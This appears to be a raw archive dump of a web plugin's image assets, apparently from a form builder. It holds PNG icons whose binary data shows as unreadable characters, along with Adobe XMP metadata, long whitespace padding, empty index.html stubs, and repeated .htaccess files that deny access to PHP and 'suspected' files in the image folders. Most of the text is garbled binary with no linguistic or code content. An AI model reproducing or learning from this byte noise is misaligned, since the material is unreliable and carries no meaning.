��wyA��"LLL|1�L'�rn~~޲��a*�I�0��r]]]����Y��$��X50����P(�R�CR�E�����!��ٹd�n^�"���/�:���3�^=A�'S���8��~Ѯ���K_�k��)�+�b�½(��C�xD�C��7���:�}���~����S��*�-s�d瀑~��m)�
��N�R	�[D�T
Z�.���},����1�?�����3@���Th�6��o^})e+��v�����p444$���(cp�ǹ97��S�@ 0��պ���
.�k���5��<F�&�\,����r�!…H��|��<��b�
o^�~��f���1R�)'#�

-�ן�Rj
��*]��y�]@vp�wjه8l�Z�[���f���"�����݅k�K�(]XX��#�D��i*��}%�c�����vH�jMKI�m{{ۺv�5��B�ς/�>����I�����&�&Q��MMM�������1�%S�b�#"�I?44�����^dX�8��)�*�ݻ�-�Mn�G�Cؾ]6����K~Jˉ*�6
��4�e�RФ����qD��x\�q�]ә,�H%����U
t��&v�Nm��M�{vY���Ϛ����ߥ�L�-�����u��:�ϓ�'0�S���1r���d������lG��t/--�{�^v�exx�Y�V��Rx����G"f���w����@���$N������Ƙ�b���I�[6::J8^J�=w������5��|�BA���G���S��J�=g��������O}(Ј� ����J��xp��탻���w��X��IEND�B`�images/01/02/previous_hover.png000060400000002325152434416630012245 0ustar00�PNG


IHDR$k/�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:969614CD528A11E3959290293A03672C" xmpMM:DocumentID="xmp.did:969614CE528A11E3959290293A03672C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:969614CB528A11E3959290293A03672C" stRef:documentID="xmp.did:969614CC528A11E3959290293A03672C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�&>IIDATxڬ�]+Q��1y�U(Qj%��R.H�Y�-o����q�p�(��$)I>	!�\�?��:mfwf���bvN����3u��V8=�Cc��P7]Q��PчB�.��>��<X�B��'�b

�w2�NeLZ�k���(
֪�p����:��4�_
k�cM��&a�Ƴ��8:���`%�DT��Z�X�B�y_�؃�h6dL��]Z��ۦ��`k��F�Mڷ�~iC�d0&�C�td�9p�N,0.�N�9p��-0�o���-ѵ�y���8G��̧�w�̇nQ���;�Ѓ&�FS�h���&�J��l�ɼ��L��3�F�LIEND�B`�images/01/02/next_hover.png000060400000002311152434416630011342 0ustar00�PNG


IHDR$k/�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8A93B799528A11E3B17FE8FF39788487" xmpMM:DocumentID="xmp.did:8A93B79A528A11E3B17FE8FF39788487"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8A93B797528A11E3B17FE8FF39788487" stRef:documentID="xmp.did:8A93B798528A11E3B17FE8FF39788487"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G
��=IDATxڬ�]+DQ@��4��D��$�eʃ�?��΃|L�c^�xPJ)%�R�P��ڵդ\{�Zݺ��{�9uab�#���9|�>G��m1����#&t`[<bB����.�f��Ѝ���zp�1�W��1�7�߷7~
Ƅ�?�k��	
6xĄQ\���}=�+�AKL��寠5&L��{Ą,.zń�Wl�=b9��wkLF������+Y��gE
�Yw�>N�uo�x�P�ؑ�^���X'ųuҞ�0>YπS
=ZO�3��Պ�� �[O�
�Y����ނ�po���C
][Fȧ��7> ��IEND�B`�images/01/02/.htaccess000044400000000424152434416630010256 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/01/02/index.html000060400000000042152434416630010447 0ustar00<!DOCTYPE html><title></title>
images/01/02/next_hoverbg.png000060400000001632152434416630011660 0ustar00�PNG


IHDR�wS�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:95873280528B11E397ACD36925815897" xmpMM:DocumentID="xmp.did:95873281528B11E397ACD36925815897"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9587327E528B11E397ACD36925815897" stRef:documentID="xmp.did:9587327F528B11E397ACD36925815897"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���IDATx�b`��0,�5�\OIEND�B`�images/01/checkbox.png000060400000001073152434416630010532 0ustar00�PNG


IHDR
Oy�sBIT|d��IDAT(����kQƿ;�G��L��#.L�NR���,$�G���ZnZ�V��U�7�]A� ��(���B\��U2�L����{�(�bl<��9��<���4�p:����ɤn�q�y�EM��R�u�Vۧ�~��J�N+��H�
���bQ���pœ���<�'<�O&�;���O2�b�D���x���<"��
���VVn���cB�D��B�E(}3`Y�q����N�Z���޾�y��M��G�ɶ�i��ц��W\b�����zCQ� �M"Is���˲h0|�i�F��ܥ����rB�@4�`�0.��-Y��E"���%UUe!D�s~�C���s0x�F��+��ǘa�p �X���L�l麞�t:�3�����^���^?`��a���/�nw/�o���+_��
!-�˟2����0rc?px�l6��8�X^Z��]������8�8���p�J�����9��w����T�ER��IEND�B`�images/01/date.png000060400000003320152434416630007656 0ustar00�PNG


IHDR ½"sRGB���gAMA���a	pHYs���o�deIDATHK�W�O�Uo2͌�?�qYԛ�^�����z�.L�0k) �-�m�'��׵�`�P
-��(_-���1�2�i���o���9%����<��y�s��V$��H$,,,�5;;{dnnŭ[��^YY9��+���������C �
(�L���(���u�XL?55�dǩ/ؐ]�S��zzz�0�_}F��j?��ӻ��A�A������޲lv���=l�Z����9�
8d���x�O���ߝ���c�����6�FsGUR����!���zY�R�C���|!
����G<�>����>�!�2�뚚�


�����@ Pi(-������ZZZ�pP�z��I�.��U���Atuu��h>��F��ui�;��B�&�C����
_A~�b~~�rQQ�ܕ+W�,��LF�
vOҘꃰ�l2�6�L��K�h����ųVk�q�ƍ�Dxylll�c�T*��'O>=����'���47�_�>�$��|�rߏ��Ҙ���‡�F�S###3�y4N~J��,<��R��$�Lr,�ͼL*���mr�h�����/�

n�9������_����`�U/6����FGG%�B�0n�T�M��x�TQ�*��H�M
�ۀ��`�d�D{K�r R�Z��y^&�m7y��C�l*��'$���<�����<7wb�Y^@<��@Z[[G��8:68t��3���!��>��>;���ǐ�*�r>�X��&��X 케���Aemmm�F�
�4���~��l4v`z�F������r�8�AD��RM�O//���E�X�cA�I�q�ڵkZkY��j
	��v���эļ�s��c�op��gφre�Gdg1�c�PH�ml�"�r@Ю���>�E�T5����d�~n�Νnkm�d��#����i�GAF�n�f�MCx)��d��zzz$�B�v�c�&��b?�;;;��Q
��o��p<��*��E#�(�-"��r���E�,�
9(D|p���`��;�85��"��F��{艾�m ;��4O@�X�)��W�B����Je�XڥR�2����dj��C��j��\�����*//o��!1���������c9xW�^���X��\����'��B�S���q+<Bn����Z���$|�{c'C�S��r@�X��$8���.]�hq��!�	.�'�O›v�\>����¦�b/N�FyY�&��� �@�X,L,�J	�U~.A���+A�p��$P�F�����ӭ���_�cU���e�RVX�Yxv �9�$Q�Ơ^�=��
g
�TGG���$BƆC���̙y�UV,¿/�� !�f�مg݋��2)����c$�0��.
.Z�zN�H�u$ڣ�����|$��[��bp�#��a�_9\&�8���XG�����t��;b
����o��PvY[�i@���͛�KKK��~�����������R�C��G�s$��O�'������g~�3�5��A�
��Z|���X~�rA	�����E��>}YP��i��a�#�q��"�g0IEND�B`�images/01/01.png000060400000001620152434416630007162 0ustar00�PNG


IHDR ½"sRGB���gAMA���a	pHYs���o�dtEXtSoftwareAdobe ImageReadyq�e<IDATHKŗ�ORa��-�-�l9W�X���.j����s_W9EiK����U,��sN��7(�����+�ΛZ�����M%E%��>x��|�����㚛�K[[[��������r�lll\���L��]MY\\̀�#Ph��D�ǡP(svv��3���J,z 	h�P��xM��@�W�@���M���ߟ���u�p7�A�L�hn�/P��p#�	�d��p8�@4gaa���=����y���!^�����n7僙�����q:����4ݏN�k��dv�X�<
---z��%���5�LNN����d2)T*�����K~^ޯ�"��ߩW(� �@5�҈��p8�TՔ~:��P���1_����OMM�C�!a=��V����+,(�y�����_�:]puuUa��q�v��l6;!=����:de�D�(�#�NEy���lvc̪'&&��j��1022B㤶��C#��
��V�)J�V.�B�l�um<��g�X,,���b6��{{{���:����蛲�u[���Y��+b`hh���S*��V�>�E�7�ܱ�2]��
=	F�Q666�Y�O�|�@?僾�>��P>@�s8��R�^O�	Y�+D*��������L�)�q�B�`�N����~�,��oF����ؘ��a��	t^"����mmm�:;;�C��F��L�	��\L��w�p%�0I�x�Z��noo�������s�y��Ej�3���IEND�B`�images/01/.htaccess000044400000000424152434416630010035 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/01/01/previous_hover.png000060400000002316152434416630012244 0ustar00�PNG


IHDR$��j�tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:7DE348CE096A11E3970391451275D3F3" xmpMM:InstanceID="xmp.iid:7DE348CD096A11E3970391451275D3F3" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02DBE408096A11E3AD45B5BC9CB25A75" stRef:documentID="xmp.did:02DBE409096A11E3AD45B5BC9CB25A75"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>j��0CIDATxڬ��GCq��d�T��$1�T*��.����,�~��n"u]��E��y�f���g3���|;~�+	qCh�SDQ	����S"|�G'h8��d��bT����Q�^t��a7}�t�ƚ��J���M��G�>͵@vф�wou�m4�K�A]��F�_�d�E���d��yf\���q�`B<J
(��'��P^=�}'�0B�h��ZF{*�}�%;&$(�����iXI�����T(�й
q�]�W���J��74��U��v�Bܫ��*�U��S!�Ű{�
+���&у
q��]�	0�6h��IEND�B`�images/01/01/next_hover.png000060400000002301152434416630011340 0ustar00�PNG


IHDR$��j�tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:02DBE408096A11E3AD45B5BC9CB25A75" xmpMM:DocumentID="xmp.did:02DBE409096A11E3AD45B5BC9CB25A75"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02DBE406096A11E3AD45B5BC9CB25A75" stRef:documentID="xmp.did:02DBE407096A11E3AD45B5BC9CB25A75"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��R�6IDATxڬ�KG�a��^#)M�$����i�(Zd��/;(�蠚M�Y�C�hQ%*������S3s�͵���{����=��(��S��Ud�c�VE�>8�.Ud�oTb�
� ��,����Ȓ�=�PE�!���"�0�'5���K�(�8lB�*�L��UY�a�,4�ZiX�)B����LY�a�Ȳ�f�,��m��*ځ%�PD6f��T��+VU�Q�%o��>�9xUz�f�$��
.yQ�ѹw��2!�0O�̾pɣ�EJ>Zk�P�D�0�ʦ-��N�W.�(��5�­r���F�'_$7j����IEND�B`�images/01/01/next_hoverbg.png000060400000000235152434416630011655 0ustar00�PNG


IHDRĉsRGB���gAMA���a	pHYs���o�dtEXtSoftwareAdobe ImageReadyq�e<
IDATWc��*�?�5���IEND�B`�images/01/01/index.html000060400000000042152434416630010446 0ustar00<!DOCTYPE html><title></title>
images/01/01/.htaccess000044400000000424152434416630010255 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/plus.png000060400000045666152434416630007527 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�<�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-18T11:54:49+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-18T11:55:07+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-18T11:55:07+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:d4e61d4c-b0d3-9b4c-8a58-993324e71cf1</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:aa289659-8dc9-11e5-908b-ca098794a1d9</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:04bdf211-3ac1-5848-8537-5349411fe749</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:04bdf211-3ac1-5848-8537-5349411fe749</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:54:49+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:d4e61d4c-b0d3-9b4c-8a58-993324e71cf1</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:55:07+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>۔�C cHRMz%������u0�`:�o�_�FHIDATx���s�t�W?=,�aI��q����
}�B��&�0C�qa���	��00�����$%�P��L��4��o=,ٲ�\L7��d`��4��7�H���
[���uC�_�1��zL=�G�8*��Ćh�'X�w�Z�(�n*�E%(AJ�QLJ�N�>K����ٸ��P�M�|a�߫?3a!>�z'H�S���nM�*6�rF�y�q�{�e<&CI�������g��R1��%!y�I�a�/��{j��1�o6o9V)����uE���0�'�7ʿuDe�3Rj,Ħ�Z�E/�e<BD��Ed��4>6ԞJs'��x8��v3��M��������h�k��,�V��7�p����b�Bb���`����F@���X��ߵUש~b���R�9�!����a�{�}���f7�>��/Kݯ�(�c?�������������C�1�z_�F8�aLu��6y�Q^�fc�#S��-5ĦI:���`x9Cs=M���z�n{EDD��3n]�=��VYݓ��Ҽkk���M� (1�6+�k"�+�<��/�8�pыb�*Nr�9%{�(��W):�}eU{�f�ȩ�w�k_�ފ�W#��y�J�W�(�I���Ѐ�iMJ]����r:VQ��񰐸�Pȩ���AIbr�J
��l��K���^y�:#������j�����
^~QL��К�ŵ/Hm+��ү��Upm��WӗK����a;��.V��H�%1y��f�٩M[��Um��+�J�q߳��	�|OH�D���v�����Jq�N'�Ϫ<��?�T�Sv8�t�QNz��a�o�957�)&�X�\S�Mk��-��qV<�w���tU]���}+͟d���lb�#\􂖟)��֋s�H��3Bd��&'_l�p�H:.���zy��+�JS�x9�a��ٚ��5>6$t
#�ޡh���f��O�g<�ClZJ�1��&���N�r�⬖�vm�9\77�+�2€����w!MeAٚ�k�#��m��T�Wx9�:�X�Ue��tēixzq�P��0/_B�rlU���_6�b����9��[/�<�(	EIEND�B`�images/down.png000060400000003053152434416630007473 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A1DA110F8F7C11E5830598522ADB673D" xmpMM:InstanceID="xmp.iid:A1DA110E8F7C11E5830598522ADB673D" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^��LwIDATx�bt[s����##������ �Qd=dš��w�I�B������	*	4bg�M���ǟ��<���uG�4?;+� �F8`�P?��C�&LY�?#�Ї��U����YA��f}��K������� |  t!����#\U&XQ�"&Fa����|��[������IG^�Q��V�;��
#�iX܄f��b��j���
�+?���ĈCP�އoG"����F��AI����?P�����	��������a�Ut+3�D��>H�`b��Ȉ��������%�/	p���x��{�T
n3���?,���`fgb��[FAN&F|!�#��p����12��ӯ?��nj1�L抗�~��
N��3��I4��3���O���LZH����U�q�‚�?��=����bd�dFx��;�)nfFF�FqP����Y��:��af���3P�ʛ�l�B�۱10�������w��d�g���0}������ǯ��;���FU���������40������r�
��>�� 7#�l��/��,�������	O��I�����N���Lu��]�g
M�IEND�B`�images/captcha_refresh.png000060400000001437152434416630011651 0ustar00�PNG


IHDR�JL� cHRMz%������u0�`:�o�_�F	pHYs."."��ݒ�IDATHK��;hQ�݉�hX�(���"�`�����E�Ԉ�)�.�J)���`���X�(� %Q�����Mv����r2;�ݸw��̹3w7�$�*�J\��{�B3� ���yo��$���pƠ|!Z���;�m�[j$`%�����q�N�+�YX�*�S��\TR�3��t�#���Ċ�x
���@���6q��v�x�(lO�5V�a\�b_Hdʵ0�:2��cju�Z>X!��I��	���v�y�������9��pxi~/p�V
?�´�J/����} u��W�!�W�/��)��t4�gD��{+�8�,�39���5��#�"t�����I�2=��:	u�B=rF��f�O3j�%=���zŠz���
�S�qJ�{<bx4�Z-��e�'�D�Op�U+�o��a�G/��m��j����Y#t%V�py"ˉ0"y�ے��qX]��Z�����1s/I��S���j����9��4��p�������C�_U��z<����c~ܞ���;`���]���\�w*N_��]̗��0�����E�P����$�~����`�V��q�dm�Ev�����f}'B7`��Dm��8��
��
�aC��6Yߨ$��a?�eM��M��0��GzIEND�B`�images/FormMakerLogo-16.png000060400000001324152434416630011453 0ustar00�PNG


IHDR��UgAMA���atEXtSoftwareAdobe ImageReadyq�e<fIDAT8O��KhQ�ĕhݸw���nDA

uc7��
*�+(�`��((>
ں���aLM�&%��Lf����$6�Є$��=w�7�B�r�3���������V����ͦ�h4���uъ���:"Q�ծr�B�T�\F�X4�f������#�N����+�J�3�ƚ>�"������߳��\���7Q�b�<���1�����#s|7��9�N�uLí�-8>D1tK�̼��BT�╂����i����Ҹ�<���4F)�Vt�:�PS�^*�:����\.�$���t,,ncvn�o��
u#Q6 Y��)m_�P�u��K?Je�~'��,��S��|@����R���M6e�0�J��(*�*��6��%�b1S{���W�ؐ5���%���É�hS�@<�C�,� ���еuD�
